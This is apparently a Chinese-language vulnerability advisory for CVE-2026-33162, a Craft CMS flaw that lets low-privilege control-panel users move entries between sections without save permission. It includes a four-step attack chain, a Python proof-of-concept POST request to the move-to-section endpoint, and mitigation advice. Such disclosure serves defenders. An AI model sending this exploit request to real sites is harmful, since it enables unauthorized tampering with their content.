IPBUF安全漏洞报告
English
CVE-2026-33162 CVSS 6.5 中危

CVE-2026-33162 Craft CMS 权限绕过漏洞

披露日期: 2026-03-24

漏洞信息

漏洞编号
CVE-2026-33162
漏洞类型
权限绕过
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Craft CMS

相关标签

权限绕过Craft CMSAccess ControlCVE-2026-33162

漏洞概述

Craft CMS 5.3.0至5.9.14之前版本存在权限绕过漏洞。拥有控制面板访问权限的低权限用户,可以通过特定接口将条目跨版块移动,绕过了对源版块和目标版块的保存权限检查。该漏洞可能导致数据完整性受损,攻击者可非法篡改内容结构。

技术细节

该漏洞源于Craft CMS在处理条目移动请求时的权限校验逻辑缺陷。受影响版本中,`/actions/entries/move-to-section` 接口仅验证了用户是否拥有 `accessCp`(访问控制面板)权限,而未严格检查用户是否具备源版块和目标版块的 `saveEntries:{sectionUid}` 权限。攻击者只要能登录后台,即可构造恶意POST请求,指定条目ID和目标版块UID,强制将条目移动至无权操作的区域。这破坏了CMS的内容隔离机制,导致完整性影响为高。

攻击链分析

STEP 1
步骤1:信息收集
攻击者识别出目标网站使用的是Craft CMS,且版本在5.3.0至5.9.14之间。
STEP 2
步骤2:获取低权限账号
攻击者注册或获取一个仅拥有accessCp(访问控制面板)权限的普通账号,无需内容编辑权限。
STEP 3
步骤3:发送恶意请求
攻击者使用该账号登录,获取Session,并向/actions/entries/move-to-section发送POST请求,携带目标条目ID和目标版块ID。
STEP 4
步骤4:权限绕过
由于后端未校验saveEntries权限,系统接受请求并将条目移动至攻击者原本无权操作的版块,造成数据完整性破坏。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL of the vulnerable Craft CMS instance target_url = "https://target-craft-site.com/actions/entries/move-to-section" # Valid session cookie for a user with 'accessCp' permission # but without 'saveEntries' permission for the target section cookies = { "PHPSESSID": "valid_session_cookie_here", "CraftSessionId": "session_id_here" } # Exploit payload: Move an entry to an unauthorized section payload = { "entryId": "123", # ID of the entry to move "sectionId": "456", # ID of the target section (unauthorized) "siteId": "1" # Site ID } try: response = requests.post(target_url, data=payload, cookies=cookies, timeout=10) if response.status_code == 200: print("[+] Exploit successful! Entry moved without proper permissions.") else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] Error occurred: {e}")

影响范围

Craft CMS >= 5.3.0, < 5.9.14

防御指南

临时缓解措施
如果无法立即升级,建议通过WAF或服务器配置暂时阻断对/actions/entries/move-to-section接口的访问,或严格限制控制面板的登录IP地址,直到补丁应用完成。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表